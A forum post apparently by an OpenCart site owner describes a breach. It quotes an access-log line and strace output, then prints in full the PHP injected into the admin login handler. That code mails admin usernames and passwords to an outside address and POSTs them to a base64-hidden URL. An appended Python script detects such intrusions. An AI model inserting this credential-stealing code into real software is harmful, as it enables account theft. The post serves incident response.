We scanned the domain logs relative to when the files that were injected got changed, and here's what we've got:
Code:
/home/........./logs/floridarealestateschool.com-ssl_log-Oct-2018.gz:185.189.150.77 - - [20/Oct/2018:12:59:22 -0400] "POST /enroll/admin/web.php HTTP/1.1" 200 29124 "https://floridarealestateschool.com/enroll/admin/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
Another message from our server techs had this information.
First, an strace of the process generated by the script /home/.../public_html/enroll/admin/index.php was performed. It was found that the following system call was being made, which was taking a large amount of time to complete. It appears to be sending outbound traffic to the IP address "198.46.205.125".
22:52:10.583479 connect(8, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("198.46.205.125")}, 16) = -1 EINPROGRESS (Operation now in progress)
Next it was found that in the script /home/......./public_html/enroll/admin/controller/common/login.php the following malicious code had been injected.
Code:
if ($this->user->login($this->request->post['username'], $this->request->post['password'])) {
    // Only runs on a successful admin login: builds "host/uri|username|password"
    $smail = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . "|" . $this->request->post['username'] . "|" . $this->request->post['password'];
    // Exfiltrates the credentials by e-mail
    mail("thankforyourhelp2015@gmail.com", $_SERVER['HTTP_HOST'], $smail, "From: admin@fly.com\r\nReply-to: thankforyourhelp2015@gmail.com");
    // ...and again by HTTP POST to a base64-obscured URL
    $curl2 = curl_init();
    curl_setopt($curl2, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl2, CURLOPT_URL, base64_decode('aHR0cDovL2FueXRoaW5ncHJvLm5ldC9nZXQyLnBocA=='));
    curl_setopt($curl2, CURLOPT_POST, 1);
    curl_setopt($curl2, CURLOPT_POSTFIELDS, 'mailadmin=' . urlencode($smail));
    curl_exec($curl2);
    curl_close($curl2);
}
It looks like this could have been used to siphon passwords and send them to a remote address.
I don't know how they managed to put the web.php page on our server. Any ideas?
We have run several scans to make sure there is no more malware, and we have checked our databases and can't find anything that has been corrupted.
As soon as we found the problem (a couple of days ago) we put the site in Maintenance mode and deleted the malicious code. We have also completely replaced the entire public_html with a copy from before the breach. We changed our usernames and passwords. At this point I have also changed the name of the admin folder and put it behind a .htaccess/.htpasswd. Before this happened we already had SSH and SFTP, etc. locked to specific IP addresses. The contact form and the returns forms already had captcha. I thought we were fairly secure, but now I am worried about other potential sources of security breaches. Is there anything else I should do to secure this OpenCart from hackers?
Sandra King
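The two indicators in this post (a POST to an unexpected script inside the admin folder, and a login handler that suddenly contains mail(), curl_init() and base64_decode()) are easy to check for routinely. The script below is an added example, not code from the post or from OpenCart; it assumes a stock admin directory is only ever requested through index.php (adjust ADMIN_ALLOWED if you have legitimate extra scripts), and the log lines and PHP snippets are constructed samples, not the real data.

```python
import re

# Combined log format, as quoted in the post (constructed parser, not OpenCart code).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Assumption: a stock OpenCart admin folder is fronted only by index.php.
ADMIN_PREFIX = "/enroll/admin/"
ADMIN_ALLOWED = {"index.php"}


def suspicious_admin_hits(lines):
    """Return (ip, timestamp, path) for POSTs to unexpected PHP scripts under the admin folder."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m or m["method"] != "POST" or not m["path"].startswith(ADMIN_PREFIX):
            continue
        script = m["path"][len(ADMIN_PREFIX):].split("?", 1)[0]
        if script.endswith(".php") and script not in ADMIN_ALLOWED:
            hits.append((m["ip"], m["ts"], m["path"]))
    return hits


# The injected login.php combined three things a login handler never needs:
# an outbound mail() call, a curl_* call and a base64_decode()'d URL.
INJECTION_MARKERS = ("mail(", "curl_init(", "base64_decode(")


def injected_login_markers(php_source):
    """Return which markers appear in a PHP source string; all three together is a strong signal."""
    return tuple(m for m in INJECTION_MARKERS if m in php_source)


# Constructed sample data modelled on the post (not the real logs or files).
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Oct/2018:12:58:01 -0400] "GET /enroll/admin/index.php?route=common/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Oct/2018:12:58:09 -0400] "POST /enroll/admin/index.php?route=common/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Oct/2018:12:59:22 -0400] "POST /enroll/admin/web.php HTTP/1.1" 200 29124 "https://example.com/enroll/admin/web.php" "Mozilla/5.0"',
]
CLEAN_LOGIN = "if ($this->user->login($u, $p)) { $this->response->redirect($url); }"
INJECTED_LOGIN = "mail('a@b', 'x', $smail); $c = curl_init(); curl_setopt($c, CURLOPT_URL, base64_decode('aGk='));"

if __name__ == "__main__":
    for hit in suspicious_admin_hits(SAMPLE_LOG):
        print("unexpected admin POST:", hit)
    print("markers in login.php:", injected_login_markers(INJECTED_LOGIN))
```

Run the first function over the uncompressed access logs (zcat the .gz files first) and the second over every controller file under admin/; compare the marker results against a known-clean OpenCart checkout of the same version.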